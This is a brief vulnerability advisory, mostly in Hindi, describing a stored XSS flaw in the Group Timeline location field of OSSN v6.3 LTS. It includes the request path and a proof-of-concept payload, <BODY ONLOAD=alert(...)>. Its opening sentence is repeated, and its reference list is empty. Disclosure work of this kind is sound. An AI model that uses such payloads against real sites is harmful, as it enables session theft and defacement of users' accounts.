
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS में Group Timeline मॉड्यूल के माध्यम से एक stored cross-site scripting (XSS) कमजोरी पाई गई।
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS में Group Timeline मॉड्यूल के माध्यम से एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता पाई गई है।
हमलावर को Group Timeline पर कुछ पोस्ट करना होगा और XSS पेलोड को स्थान इनपुट पर डालना होगा ताकि संग्रहीत XSS का शोषण किया जा सके। XSS पेलोड सबमिशन के तुरंत बाद लॉन्च हो जाएगा।
http://ip_address:port/ossn/group/{number}
POST /ossn/action/wall/post/g?ossn_ts=1656419377&ossn_token=c0ee6b52f853a5073679f7a82372a0726a6a6e7d5500ec372fef9341f1e45e21
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome Version 102.0.5005.115 (Official Build) (x86_64)
:shipit: Grim The Ripper Team द्वारा SOSECURE Thailand
संदर्भ: